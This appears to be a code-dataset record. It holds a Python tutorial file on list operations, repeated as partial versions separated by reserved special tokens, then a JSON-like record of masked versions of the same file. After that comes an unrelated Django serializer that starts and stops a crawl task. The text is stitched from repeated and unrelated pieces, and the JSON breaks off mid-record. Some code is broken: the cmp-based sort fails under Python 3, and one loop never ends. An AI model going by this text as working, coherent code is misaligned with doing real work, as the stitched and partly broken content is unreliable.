def get_len_count_index_list():
print('=== get_len_count_index_list ===')
l = ['a', 'b', 'c', 'd', 'e', 'e']
print(l[0])
print('len: {}'.format(len(l)))
print('count d: {}'.format(l.count('d')))
print('count e: {}'.format(l.count('e')))
print('count f: {}'.format(l.count('f')))
print('index d: {}'.format(l.index('d')))
print('index e: {}'.format(l.index('e')))
def sort_reverse_list():
print('=== sort_reverse_list ===')
l = ['e', 'b', 'c', 'a', 'f', 'd']
print(l)
print(l.sort())
print(l)
l.sort(cmp=lambda x, y: -cmp(x, y))
print(l)
print(l.reverse())
print(l)
print(list(reversed(l)))
print(l)
def _sort_func(x):
return x[0] + x[1]
def sort_list():
print('=== sort_list ===')
l = [(1, 2), (3, 1), (2, 3)]
print(sorted(l, key=lambda x: x[1]))
print(sorted(l, key=lambda x: x[0]))
print(sorted(l, key=_sort_func))
def list_index():
print('=== list_index ===')
l = ['a', 'b', 'c']
print(l.index('a'))
def list_slice():
print('=== list_slice ===')
l = [1, 2, 3]
print(l[:1])
print(l[:5])
print(l[-1:])
print(l[-5:])
print(l[:-1])
print(l[10:20])
ls = l[:1]
ls[0] = 2
print(ls)
print(l)
def list_slice_with_step():
print('=== list_slice_with_step ===')
l = list(range(20))
print(l[::3])
print(l[1::3])
print(l[2::3])
print(l[::-1])
l[::3] = [0, 0, 0, 0, 0, 0, 0]
print(l)
del l[::3]
print(l)
def list_comprehension():
print('=== list_comprehension ===')
l = [(i * i) for i in range(3)]
print(l)
def test_insert_when_traversing():
print('=== test_insert_when_traversing ===')
l = [3, 4]
for i in l:
l.insert(0, -i)
print(i)
def main():
list_slice()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def insert_append_and_extend_list():
print('=== insert_append_and_extend_list ===')
l = ['e', 'h']
l.insert(-1, 'g')
print(l)
l.insert(1, 'f')
print(l)
l.insert(0, 'd')
print(l)
l.insert(10, 'i')
print(l)
l.append('l')
print(l)
l.extend(['m', 'n'])
print(l)
l[0:0] = ['b', 'c']
print(l)
l = ['a'] + l
print(l)
<|reserved_special_token_0|>
def get_len_count_index_list():
print('=== get_len_count_index_list ===')
l = ['a', 'b', 'c', 'd', 'e', 'e']
print(l[0])
print('len: {}'.format(len(l)))
print('count d: {}'.format(l.count('d')))
print('count e: {}'.format(l.count('e')))
print('count f: {}'.format(l.count('f')))
print('index d: {}'.format(l.index('d')))
print('index e: {}'.format(l.index('e')))
def sort_reverse_list():
print('=== sort_reverse_list ===')
l = ['e', 'b', 'c', 'a', 'f', 'd']
print(l)
print(l.sort())
print(l)
l.sort(cmp=lambda x, y: -cmp(x, y))
print(l)
print(l.reverse())
print(l)
print(list(reversed(l)))
print(l)
def _sort_func(x):
return x[0] + x[1]
def sort_list():
print('=== sort_list ===')
l = [(1, 2), (3, 1), (2, 3)]
print(sorted(l, key=lambda x: x[1]))
print(sorted(l, key=lambda x: x[0]))
print(sorted(l, key=_sort_func))
def list_index():
print('=== list_index ===')
l = ['a', 'b', 'c']
print(l.index('a'))
def list_slice():
print('=== list_slice ===')
l = [1, 2, 3]
print(l[:1])
print(l[:5])
print(l[-1:])
print(l[-5:])
print(l[:-1])
print(l[10:20])
ls = l[:1]
ls[0] = 2
print(ls)
print(l)
def list_slice_with_step():
print('=== list_slice_with_step ===')
l = list(range(20))
print(l[::3])
print(l[1::3])
print(l[2::3])
print(l[::-1])
l[::3] = [0, 0, 0, 0, 0, 0, 0]
print(l)
del l[::3]
print(l)
def list_comprehension():
print('=== list_comprehension ===')
l = [(i * i) for i in range(3)]
print(l)
def test_insert_when_traversing():
print('=== test_insert_when_traversing ===')
l = [3, 4]
for i in l:
l.insert(0, -i)
print(i)
def main():
list_slice()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def insert_append_and_extend_list():
print('=== insert_append_and_extend_list ===')
l = ['e', 'h']
l.insert(-1, 'g')
print(l)
l.insert(1, 'f')
print(l)
l.insert(0, 'd')
print(l)
l.insert(10, 'i')
print(l)
l.append('l')
print(l)
l.extend(['m', 'n'])
print(l)
l[0:0] = ['b', 'c']
print(l)
l = ['a'] + l
print(l)
def remove_pop_list():
print('=== remove_pop_list ===')
l = ['a', 'b', 'c', 'd', 'e', 'e']
print(l)
print('l.remove: {}'.format(l.remove('e')))
print(l)
if 'h' in l:
l.remove('h')
l.pop()
print(l)
l.pop(1)
print('l.pop: {}'.format(l.pop(1)))
print(l)
def get_len_count_index_list():
print('=== get_len_count_index_list ===')
l = ['a', 'b', 'c', 'd', 'e', 'e']
print(l[0])
print('len: {}'.format(len(l)))
print('count d: {}'.format(l.count('d')))
print('count e: {}'.format(l.count('e')))
print('count f: {}'.format(l.count('f')))
print('index d: {}'.format(l.index('d')))
print('index e: {}'.format(l.index('e')))
def sort_reverse_list():
print('=== sort_reverse_list ===')
l = ['e', 'b', 'c', 'a', 'f', 'd']
print(l)
print(l.sort())
print(l)
l.sort(cmp=lambda x, y: -cmp(x, y))
print(l)
print(l.reverse())
print(l)
print(list(reversed(l)))
print(l)
def _sort_func(x):
return x[0] + x[1]
def sort_list():
print('=== sort_list ===')
l = [(1, 2), (3, 1), (2, 3)]
print(sorted(l, key=lambda x: x[1]))
print(sorted(l, key=lambda x: x[0]))
print(sorted(l, key=_sort_func))
def list_index():
print('=== list_index ===')
l = ['a', 'b', 'c']
print(l.index('a'))
def list_slice():
print('=== list_slice ===')
l = [1, 2, 3]
print(l[:1])
print(l[:5])
print(l[-1:])
print(l[-5:])
print(l[:-1])
print(l[10:20])
ls = l[:1]
ls[0] = 2
print(ls)
print(l)
def list_slice_with_step():
print('=== list_slice_with_step ===')
l = list(range(20))
print(l[::3])
print(l[1::3])
print(l[2::3])
print(l[::-1])
l[::3] = [0, 0, 0, 0, 0, 0, 0]
print(l)
del l[::3]
print(l)
def list_comprehension():
print('=== list_comprehension ===')
l = [(i * i) for i in range(3)]
print(l)
def test_insert_when_traversing():
print('=== test_insert_when_traversing ===')
l = [3, 4]
for i in l:
l.insert(0, -i)
print(i)
def main():
list_slice()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def init_list():
print('=== init_list ===')
l = list()
print(l)
l2 = []
print(l2)
l3 = list((1, 2))
print(l3)
l4 = [1, 2]
print(l4)
def insert_append_and_extend_list():
print('=== insert_append_and_extend_list ===')
l = ['e', 'h']
l.insert(-1, 'g')
print(l)
l.insert(1, 'f')
print(l)
l.insert(0, 'd')
print(l)
l.insert(10, 'i')
print(l)
l.append('l')
print(l)
l.extend(['m', 'n'])
print(l)
l[0:0] = ['b', 'c']
print(l)
l = ['a'] + l
print(l)
def remove_pop_list():
print('=== remove_pop_list ===')
l = ['a', 'b', 'c', 'd', 'e', 'e']
print(l)
print('l.remove: {}'.format(l.remove('e')))
print(l)
if 'h' in l:
l.remove('h')
l.pop()
print(l)
l.pop(1)
print('l.pop: {}'.format(l.pop(1)))
print(l)
def get_len_count_index_list():
print('=== get_len_count_index_list ===')
l = ['a', 'b', 'c', 'd', 'e', 'e']
print(l[0])
print('len: {}'.format(len(l)))
print('count d: {}'.format(l.count('d')))
print('count e: {}'.format(l.count('e')))
print('count f: {}'.format(l.count('f')))
print('index d: {}'.format(l.index('d')))
print('index e: {}'.format(l.index('e')))
def sort_reverse_list():
print('=== sort_reverse_list ===')
l = ['e', 'b', 'c', 'a', 'f', 'd']
print(l)
print(l.sort())
print(l)
l.sort(cmp=lambda x, y: -cmp(x, y))
print(l)
print(l.reverse())
print(l)
print(list(reversed(l)))
print(l)
def _sort_func(x):
return x[0] + x[1]
def sort_list():
print('=== sort_list ===')
l = [(1, 2), (3, 1), (2, 3)]
print(sorted(l, key=lambda x: x[1]))
print(sorted(l, key=lambda x: x[0]))
print(sorted(l, key=_sort_func))
def list_index():
print('=== list_index ===')
l = ['a', 'b', 'c']
print(l.index('a'))
def list_slice():
print('=== list_slice ===')
l = [1, 2, 3]
print(l[:1])
print(l[:5])
print(l[-1:])
print(l[-5:])
print(l[:-1])
print(l[10:20])
ls = l[:1]
ls[0] = 2
print(ls)
print(l)
def list_slice_with_step():
print('=== list_slice_with_step ===')
l = list(range(20))
print(l[::3])
print(l[1::3])
print(l[2::3])
print(l[::-1])
l[::3] = [0, 0, 0, 0, 0, 0, 0]
print(l)
del l[::3]
print(l)
def list_comprehension():
print('=== list_comprehension ===')
l = [(i * i) for i in range(3)]
print(l)
def test_insert_when_traversing():
print('=== test_insert_when_traversing ===')
l = [3, 4]
for i in l:
l.insert(0, -i)
print(i)
def main():
list_slice()
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
# coding: utf-8
def init_list():
print("=== init_list ===")
l = list()
print(l)
l2 = []
print(l2)
l3 = list((1, 2))
print(l3)
l4 = [1, 2]
print(l4)
def insert_append_and_extend_list():
print("=== insert_append_and_extend_list ===")
l = ['e', 'h']
l.insert(-1, 'g')
print(l)
l.insert(1, 'f')
print(l)
l.insert(0, 'd')
print(l)
l.insert(10, 'i')
print(l)
l.append('l')
print(l)
l.extend(['m', 'n'])
print(l)
l[0:0] = ['b', 'c']
print(l)
l = ['a'] + l
print(l)
def remove_pop_list():
print("=== remove_pop_list ===")
l = ['a', 'b', 'c', 'd', 'e', 'e']
print(l)
print('l.remove: {}'.format(l.remove('e'))) # 只删除第一次出现的,没有返回
print(l)
# l.remove('h') # 删除不存在的会导致 ValueError
if 'h' in l:
l.remove('h')
l.pop()
print(l)
l.pop(1)
print('l.pop: {}'.format(l.pop(1)))
print(l)
# l.pop(10) # IndexError: pop index out of range
def get_len_count_index_list():
print("=== get_len_count_index_list ===")
l = ['a', 'b', 'c', 'd', 'e', 'e']
print(l[0])
# l[10] = 'z' # IndexError: list index out of range
# print(l[10]) # IndexError: list index out of range
# print(l.get(10)) # 'list' object has no attribute 'get'
print('len: {}'.format(len(l)))
print('count d: {}'.format(l.count('d')))
print('count e: {}'.format(l.count('e')))
print('count f: {}'.format(l.count('f')))
print('index d: {}'.format(l.index('d')))
print('index e: {}'.format(l.index('e')))
# print('index f: {}'.format(l.index('f'))) # ValueError: 'f' is not in list
def sort_reverse_list():
print("=== sort_reverse_list ===")
l = ['e', 'b', 'c', 'a', 'f', 'd']
print(l)
print(l.sort()) # return None
print(l)
l.sort(cmp=lambda x, y: -(cmp(x, y)))
print(l)
print(l.reverse()) # return None
print(l)
print(list(reversed(l))) # return a reversed iterator
print(l)
def _sort_func(x):
return x[0] + x[1]
def sort_list():
print("=== sort_list ===")
l = [(1, 2), (3, 1), (2, 3)]
print(sorted(l, key=lambda x: x[1]))
print(sorted(l, key=lambda x: x[0]))
print(sorted(l, key=_sort_func))
def list_index():
print("=== list_index ===")
l = ['a', 'b', 'c']
print(l.index('a'))
def list_slice():
print("=== list_slice ===")
l = [1, 2, 3]
print(l[:1])
print(l[:5])
print(l[-1:])
print(l[-5:])
print(l[:-1])
print(l[10:20])
ls = l[:1]
ls[0] = 2
print(ls)
print(l) # 改变 ls 不会改变 l
def list_slice_with_step():
print("=== list_slice_with_step ===")
l = list(range(20))
print(l[::3])
print(l[1::3])
print(l[2::3])
print(l[::-1])
l[::3] = [0, 0, 0, 0, 0, 0, 0]
print(l)
del l[::3]
print(l)
def list_comprehension():
print("=== list_comprehension ===")
# 列表推导式
l = [i * i for i in range(3)]
print(l)
def test_insert_when_traversing():
print("=== test_insert_when_traversing ===")
l = [3, 4]
for i in l:
l.insert(0, -i)
print(i)
# 会停不下来
def main():
# init_list()
# insert_append_and_extend_list()
# remove_pop_list()
# get_len_count_index_list()
# sort_reverse_list()
# sort_list()
# list_index()
list_slice()
# list_slice_with_step()
# list_comprehension()
# test_insert_when_traversing()
if __name__ == '__main__':
main()
# https://www.tutorialspoint.com/python/python_lists.htm
# https://stackoverflow.com/a/9028088/3936457
# https://stackoverflow.com/questions/8785554/how-do-i-insert-a-list-at-the-front-of-another-list
|
flexible
|
{
"blob_id": "1a710916461644a0676a3bd84926aeabb2aa3f71",
"index": 7127,
"step-1": "<mask token>\n\n\ndef get_len_count_index_list():\n print('=== get_len_count_index_list ===')\n l = ['a', 'b', 'c', 'd', 'e', 'e']\n print(l[0])\n print('len: {}'.format(len(l)))\n print('count d: {}'.format(l.count('d')))\n print('count e: {}'.format(l.count('e')))\n print('count f: {}'.format(l.count('f')))\n print('index d: {}'.format(l.index('d')))\n print('index e: {}'.format(l.index('e')))\n\n\ndef sort_reverse_list():\n print('=== sort_reverse_list ===')\n l = ['e', 'b', 'c', 'a', 'f', 'd']\n print(l)\n print(l.sort())\n print(l)\n l.sort(cmp=lambda x, y: -cmp(x, y))\n print(l)\n print(l.reverse())\n print(l)\n print(list(reversed(l)))\n print(l)\n\n\ndef _sort_func(x):\n return x[0] + x[1]\n\n\ndef sort_list():\n print('=== sort_list ===')\n l = [(1, 2), (3, 1), (2, 3)]\n print(sorted(l, key=lambda x: x[1]))\n print(sorted(l, key=lambda x: x[0]))\n print(sorted(l, key=_sort_func))\n\n\ndef list_index():\n print('=== list_index ===')\n l = ['a', 'b', 'c']\n print(l.index('a'))\n\n\ndef list_slice():\n print('=== list_slice ===')\n l = [1, 2, 3]\n print(l[:1])\n print(l[:5])\n print(l[-1:])\n print(l[-5:])\n print(l[:-1])\n print(l[10:20])\n ls = l[:1]\n ls[0] = 2\n print(ls)\n print(l)\n\n\ndef list_slice_with_step():\n print('=== list_slice_with_step ===')\n l = list(range(20))\n print(l[::3])\n print(l[1::3])\n print(l[2::3])\n print(l[::-1])\n l[::3] = [0, 0, 0, 0, 0, 0, 0]\n print(l)\n del l[::3]\n print(l)\n\n\ndef list_comprehension():\n print('=== list_comprehension ===')\n l = [(i * i) for i in range(3)]\n print(l)\n\n\ndef test_insert_when_traversing():\n print('=== test_insert_when_traversing ===')\n l = [3, 4]\n for i in l:\n l.insert(0, -i)\n print(i)\n\n\ndef main():\n list_slice()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef insert_append_and_extend_list():\n print('=== insert_append_and_extend_list ===')\n l = ['e', 'h']\n l.insert(-1, 'g')\n print(l)\n l.insert(1, 'f')\n print(l)\n l.insert(0, 'd')\n print(l)\n l.insert(10, 'i')\n print(l)\n l.append('l')\n print(l)\n l.extend(['m', 'n'])\n print(l)\n l[0:0] = ['b', 'c']\n print(l)\n l = ['a'] + l\n print(l)\n\n\n<mask token>\n\n\ndef get_len_count_index_list():\n print('=== get_len_count_index_list ===')\n l = ['a', 'b', 'c', 'd', 'e', 'e']\n print(l[0])\n print('len: {}'.format(len(l)))\n print('count d: {}'.format(l.count('d')))\n print('count e: {}'.format(l.count('e')))\n print('count f: {}'.format(l.count('f')))\n print('index d: {}'.format(l.index('d')))\n print('index e: {}'.format(l.index('e')))\n\n\ndef sort_reverse_list():\n print('=== sort_reverse_list ===')\n l = ['e', 'b', 'c', 'a', 'f', 'd']\n print(l)\n print(l.sort())\n print(l)\n l.sort(cmp=lambda x, y: -cmp(x, y))\n print(l)\n print(l.reverse())\n print(l)\n print(list(reversed(l)))\n print(l)\n\n\ndef _sort_func(x):\n return x[0] + x[1]\n\n\ndef sort_list():\n print('=== sort_list ===')\n l = [(1, 2), (3, 1), (2, 3)]\n print(sorted(l, key=lambda x: x[1]))\n print(sorted(l, key=lambda x: x[0]))\n print(sorted(l, key=_sort_func))\n\n\ndef list_index():\n print('=== list_index ===')\n l = ['a', 'b', 'c']\n print(l.index('a'))\n\n\ndef list_slice():\n print('=== list_slice ===')\n l = [1, 2, 3]\n print(l[:1])\n print(l[:5])\n print(l[-1:])\n print(l[-5:])\n print(l[:-1])\n print(l[10:20])\n ls = l[:1]\n ls[0] = 2\n print(ls)\n print(l)\n\n\ndef list_slice_with_step():\n print('=== list_slice_with_step ===')\n l = list(range(20))\n print(l[::3])\n print(l[1::3])\n print(l[2::3])\n print(l[::-1])\n l[::3] = [0, 0, 0, 0, 0, 0, 0]\n print(l)\n del l[::3]\n print(l)\n\n\ndef list_comprehension():\n print('=== list_comprehension ===')\n l = [(i * i) for i in range(3)]\n print(l)\n\n\ndef test_insert_when_traversing():\n print('=== 
test_insert_when_traversing ===')\n l = [3, 4]\n for i in l:\n l.insert(0, -i)\n print(i)\n\n\ndef main():\n list_slice()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef insert_append_and_extend_list():\n print('=== insert_append_and_extend_list ===')\n l = ['e', 'h']\n l.insert(-1, 'g')\n print(l)\n l.insert(1, 'f')\n print(l)\n l.insert(0, 'd')\n print(l)\n l.insert(10, 'i')\n print(l)\n l.append('l')\n print(l)\n l.extend(['m', 'n'])\n print(l)\n l[0:0] = ['b', 'c']\n print(l)\n l = ['a'] + l\n print(l)\n\n\ndef remove_pop_list():\n print('=== remove_pop_list ===')\n l = ['a', 'b', 'c', 'd', 'e', 'e']\n print(l)\n print('l.remove: {}'.format(l.remove('e')))\n print(l)\n if 'h' in l:\n l.remove('h')\n l.pop()\n print(l)\n l.pop(1)\n print('l.pop: {}'.format(l.pop(1)))\n print(l)\n\n\ndef get_len_count_index_list():\n print('=== get_len_count_index_list ===')\n l = ['a', 'b', 'c', 'd', 'e', 'e']\n print(l[0])\n print('len: {}'.format(len(l)))\n print('count d: {}'.format(l.count('d')))\n print('count e: {}'.format(l.count('e')))\n print('count f: {}'.format(l.count('f')))\n print('index d: {}'.format(l.index('d')))\n print('index e: {}'.format(l.index('e')))\n\n\ndef sort_reverse_list():\n print('=== sort_reverse_list ===')\n l = ['e', 'b', 'c', 'a', 'f', 'd']\n print(l)\n print(l.sort())\n print(l)\n l.sort(cmp=lambda x, y: -cmp(x, y))\n print(l)\n print(l.reverse())\n print(l)\n print(list(reversed(l)))\n print(l)\n\n\ndef _sort_func(x):\n return x[0] + x[1]\n\n\ndef sort_list():\n print('=== sort_list ===')\n l = [(1, 2), (3, 1), (2, 3)]\n print(sorted(l, key=lambda x: x[1]))\n print(sorted(l, key=lambda x: x[0]))\n print(sorted(l, key=_sort_func))\n\n\ndef list_index():\n print('=== list_index ===')\n l = ['a', 'b', 'c']\n print(l.index('a'))\n\n\ndef list_slice():\n print('=== list_slice ===')\n l = [1, 2, 3]\n print(l[:1])\n print(l[:5])\n print(l[-1:])\n print(l[-5:])\n print(l[:-1])\n print(l[10:20])\n ls = l[:1]\n ls[0] = 2\n print(ls)\n print(l)\n\n\ndef list_slice_with_step():\n print('=== list_slice_with_step ===')\n l = list(range(20))\n print(l[::3])\n print(l[1::3])\n 
print(l[2::3])\n print(l[::-1])\n l[::3] = [0, 0, 0, 0, 0, 0, 0]\n print(l)\n del l[::3]\n print(l)\n\n\ndef list_comprehension():\n print('=== list_comprehension ===')\n l = [(i * i) for i in range(3)]\n print(l)\n\n\ndef test_insert_when_traversing():\n print('=== test_insert_when_traversing ===')\n l = [3, 4]\n for i in l:\n l.insert(0, -i)\n print(i)\n\n\ndef main():\n list_slice()\n\n\n<mask token>\n",
"step-4": "def init_list():\n print('=== init_list ===')\n l = list()\n print(l)\n l2 = []\n print(l2)\n l3 = list((1, 2))\n print(l3)\n l4 = [1, 2]\n print(l4)\n\n\ndef insert_append_and_extend_list():\n print('=== insert_append_and_extend_list ===')\n l = ['e', 'h']\n l.insert(-1, 'g')\n print(l)\n l.insert(1, 'f')\n print(l)\n l.insert(0, 'd')\n print(l)\n l.insert(10, 'i')\n print(l)\n l.append('l')\n print(l)\n l.extend(['m', 'n'])\n print(l)\n l[0:0] = ['b', 'c']\n print(l)\n l = ['a'] + l\n print(l)\n\n\ndef remove_pop_list():\n print('=== remove_pop_list ===')\n l = ['a', 'b', 'c', 'd', 'e', 'e']\n print(l)\n print('l.remove: {}'.format(l.remove('e')))\n print(l)\n if 'h' in l:\n l.remove('h')\n l.pop()\n print(l)\n l.pop(1)\n print('l.pop: {}'.format(l.pop(1)))\n print(l)\n\n\ndef get_len_count_index_list():\n print('=== get_len_count_index_list ===')\n l = ['a', 'b', 'c', 'd', 'e', 'e']\n print(l[0])\n print('len: {}'.format(len(l)))\n print('count d: {}'.format(l.count('d')))\n print('count e: {}'.format(l.count('e')))\n print('count f: {}'.format(l.count('f')))\n print('index d: {}'.format(l.index('d')))\n print('index e: {}'.format(l.index('e')))\n\n\ndef sort_reverse_list():\n print('=== sort_reverse_list ===')\n l = ['e', 'b', 'c', 'a', 'f', 'd']\n print(l)\n print(l.sort())\n print(l)\n l.sort(cmp=lambda x, y: -cmp(x, y))\n print(l)\n print(l.reverse())\n print(l)\n print(list(reversed(l)))\n print(l)\n\n\ndef _sort_func(x):\n return x[0] + x[1]\n\n\ndef sort_list():\n print('=== sort_list ===')\n l = [(1, 2), (3, 1), (2, 3)]\n print(sorted(l, key=lambda x: x[1]))\n print(sorted(l, key=lambda x: x[0]))\n print(sorted(l, key=_sort_func))\n\n\ndef list_index():\n print('=== list_index ===')\n l = ['a', 'b', 'c']\n print(l.index('a'))\n\n\ndef list_slice():\n print('=== list_slice ===')\n l = [1, 2, 3]\n print(l[:1])\n print(l[:5])\n print(l[-1:])\n print(l[-5:])\n print(l[:-1])\n print(l[10:20])\n ls = l[:1]\n ls[0] = 2\n print(ls)\n print(l)\n\n\ndef 
list_slice_with_step():\n print('=== list_slice_with_step ===')\n l = list(range(20))\n print(l[::3])\n print(l[1::3])\n print(l[2::3])\n print(l[::-1])\n l[::3] = [0, 0, 0, 0, 0, 0, 0]\n print(l)\n del l[::3]\n print(l)\n\n\ndef list_comprehension():\n print('=== list_comprehension ===')\n l = [(i * i) for i in range(3)]\n print(l)\n\n\ndef test_insert_when_traversing():\n print('=== test_insert_when_traversing ===')\n l = [3, 4]\n for i in l:\n l.insert(0, -i)\n print(i)\n\n\ndef main():\n list_slice()\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "# coding: utf-8\n\n\ndef init_list():\n print(\"=== init_list ===\")\n l = list()\n print(l)\n l2 = []\n print(l2)\n l3 = list((1, 2))\n print(l3)\n l4 = [1, 2]\n print(l4)\n\n\ndef insert_append_and_extend_list():\n print(\"=== insert_append_and_extend_list ===\")\n l = ['e', 'h']\n l.insert(-1, 'g')\n print(l)\n l.insert(1, 'f')\n print(l)\n l.insert(0, 'd')\n print(l)\n l.insert(10, 'i')\n print(l)\n l.append('l')\n print(l)\n l.extend(['m', 'n'])\n print(l)\n l[0:0] = ['b', 'c']\n print(l)\n l = ['a'] + l\n print(l)\n\n\ndef remove_pop_list():\n print(\"=== remove_pop_list ===\")\n l = ['a', 'b', 'c', 'd', 'e', 'e']\n print(l)\n print('l.remove: {}'.format(l.remove('e'))) # 只删除第一次出现的,没有返回\n print(l)\n # l.remove('h') # 删除不存在的会导致 ValueError\n if 'h' in l:\n l.remove('h')\n l.pop()\n print(l)\n l.pop(1)\n print('l.pop: {}'.format(l.pop(1)))\n print(l)\n # l.pop(10) # IndexError: pop index out of range\n\n\ndef get_len_count_index_list():\n print(\"=== get_len_count_index_list ===\")\n l = ['a', 'b', 'c', 'd', 'e', 'e']\n print(l[0])\n # l[10] = 'z' # IndexError: list index out of range\n # print(l[10]) # IndexError: list index out of range\n # print(l.get(10)) # 'list' object has no attribute 'get'\n print('len: {}'.format(len(l)))\n print('count d: {}'.format(l.count('d')))\n print('count e: {}'.format(l.count('e')))\n print('count f: {}'.format(l.count('f')))\n print('index d: {}'.format(l.index('d')))\n print('index e: {}'.format(l.index('e')))\n # print('index f: {}'.format(l.index('f'))) # ValueError: 'f' is not in list\n\n\ndef sort_reverse_list():\n print(\"=== sort_reverse_list ===\")\n l = ['e', 'b', 'c', 'a', 'f', 'd']\n print(l)\n print(l.sort()) # return None\n print(l)\n l.sort(cmp=lambda x, y: -(cmp(x, y)))\n print(l)\n print(l.reverse()) # return None\n print(l)\n print(list(reversed(l))) # return a reversed iterator\n print(l)\n\n\ndef _sort_func(x):\n return x[0] + x[1]\n\n\ndef sort_list():\n print(\"=== sort_list ===\")\n l = [(1, 
2), (3, 1), (2, 3)]\n print(sorted(l, key=lambda x: x[1]))\n print(sorted(l, key=lambda x: x[0]))\n print(sorted(l, key=_sort_func))\n\n\ndef list_index():\n print(\"=== list_index ===\")\n l = ['a', 'b', 'c']\n print(l.index('a'))\n\n\ndef list_slice():\n print(\"=== list_slice ===\")\n l = [1, 2, 3]\n print(l[:1])\n print(l[:5])\n print(l[-1:])\n print(l[-5:])\n print(l[:-1])\n print(l[10:20])\n\n ls = l[:1]\n ls[0] = 2\n print(ls)\n print(l) # 改变 ls 不会改变 l\n\n\ndef list_slice_with_step():\n print(\"=== list_slice_with_step ===\")\n l = list(range(20))\n print(l[::3])\n print(l[1::3])\n print(l[2::3])\n print(l[::-1])\n l[::3] = [0, 0, 0, 0, 0, 0, 0]\n print(l)\n del l[::3]\n print(l)\n\n\ndef list_comprehension():\n print(\"=== list_comprehension ===\")\n # 列表推导式\n l = [i * i for i in range(3)]\n print(l)\n\n\ndef test_insert_when_traversing():\n print(\"=== test_insert_when_traversing ===\")\n l = [3, 4]\n for i in l:\n l.insert(0, -i)\n print(i)\n # 会停不下来\n\n\ndef main():\n # init_list()\n # insert_append_and_extend_list()\n # remove_pop_list()\n # get_len_count_index_list()\n # sort_reverse_list()\n # sort_list()\n # list_index()\n list_slice()\n # list_slice_with_step()\n # list_comprehension()\n # test_insert_when_traversing()\n\n\nif __name__ == '__main__':\n main()\n\n# https://www.tutorialspoint.com/python/python_lists.htm\n# https://stackoverflow.com/a/9028088/3936457\n# https://stackoverflow.com/questions/8785554/how-do-i-insert-a-list-at-the-front-of-another-list\n",
"step-ids": [
10,
11,
12,
14,
15
]
}
|
[
10,
11,
12,
14,
15
] |
from django.core.cache import cache
from rest_framework import serializers
from thenewboston.constants.crawl import (
CRAWL_COMMAND_START,
CRAWL_COMMAND_STOP,
CRAWL_STATUS_CRAWLING,
CRAWL_STATUS_NOT_CRAWLING,
CRAWL_STATUS_STOP_REQUESTED
)
from v1.cache_tools.cache_keys import CRAWL_CACHE_LOCK_KEY, CRAWL_STATUS
from v1.tasks.crawl import start_crawl
class CrawlSerializer(serializers.Serializer):
    """
    Accepts a crawl command (start/stop) and transitions the cached crawl
    status accordingly, kicking off the crawl task when starting.
    """

    crawl = serializers.ChoiceField(choices=[CRAWL_COMMAND_START, CRAWL_COMMAND_STOP])

    default_error_messages = {
        **serializers.Serializer.default_error_messages,
        'cant_start_crawl': 'Can not start new crawl when already crawling',
        'cant_stop_crawl': 'Can not stop crawl if not crawling',
    }

    def create(self, validated_data):
        """Start a network crawl"""
        command = validated_data['crawl']

        if command == CRAWL_COMMAND_START:
            cache.set(CRAWL_STATUS, CRAWL_STATUS_CRAWLING, None)
            start_crawl.delay()

        if command == CRAWL_COMMAND_STOP:
            cache.set(CRAWL_STATUS, CRAWL_STATUS_STOP_REQUESTED, None)

        return validated_data

    def is_valid(self, raise_exception=False):
        # Run validation under the cache lock so two concurrent requests
        # cannot both validate against the same crawl status.
        with cache.lock(CRAWL_CACHE_LOCK_KEY):
            return super().is_valid(raise_exception)

    def update(self, instance, validated_data):
        # Create-only serializer; updates are not supported.
        raise RuntimeError('Method unavailable')

    def validate_crawl(self, crawl):
        """
        Validate the correct crawl command is given

        - can not start new crawl when already crawling
        - can not stop crawl if not crawling
        """
        current_status = cache.get(CRAWL_STATUS)
        # Per command: statuses that forbid it, plus the matching error key.
        conflicts = {
            CRAWL_COMMAND_START: (
                (CRAWL_STATUS_CRAWLING, CRAWL_STATUS_STOP_REQUESTED),
                'cant_start_crawl',
            ),
            CRAWL_COMMAND_STOP: (
                (CRAWL_STATUS_NOT_CRAWLING, CRAWL_STATUS_STOP_REQUESTED),
                'cant_stop_crawl',
            ),
        }
        blocked_statuses, error_key = conflicts.get(crawl, ((), None))
        if current_status in blocked_statuses:
            raise serializers.ValidationError(self.error_messages[error_key])
        return crawl
|
normal
|
{
"blob_id": "cb32aa6a1c42e7bb417999f3f6f74ec22209c5a0",
"index": 1230,
"step-1": "<mask token>\n\n\nclass CrawlSerializer(serializers.Serializer):\n <mask token>\n <mask token>\n\n def create(self, validated_data):\n \"\"\"Start a network crawl\"\"\"\n crawl = validated_data['crawl']\n if crawl == CRAWL_COMMAND_START:\n cache.set(CRAWL_STATUS, CRAWL_STATUS_CRAWLING, None)\n start_crawl.delay()\n if crawl == CRAWL_COMMAND_STOP:\n cache.set(CRAWL_STATUS, CRAWL_STATUS_STOP_REQUESTED, None)\n return validated_data\n <mask token>\n\n def update(self, instance, validated_data):\n raise RuntimeError('Method unavailable')\n\n def validate_crawl(self, crawl):\n \"\"\"\n Validate the correct crawl command is given\n\n - can not start new crawl when already crawling\n - can not stop crawl if not crawling\n \"\"\"\n crawl_status = cache.get(CRAWL_STATUS)\n if crawl == CRAWL_COMMAND_START and crawl_status in (\n CRAWL_STATUS_CRAWLING, CRAWL_STATUS_STOP_REQUESTED):\n raise serializers.ValidationError(self.error_messages[\n 'cant_start_crawl'])\n if crawl == CRAWL_COMMAND_STOP and crawl_status in (\n CRAWL_STATUS_NOT_CRAWLING, CRAWL_STATUS_STOP_REQUESTED):\n raise serializers.ValidationError(self.error_messages[\n 'cant_stop_crawl'])\n return crawl\n",
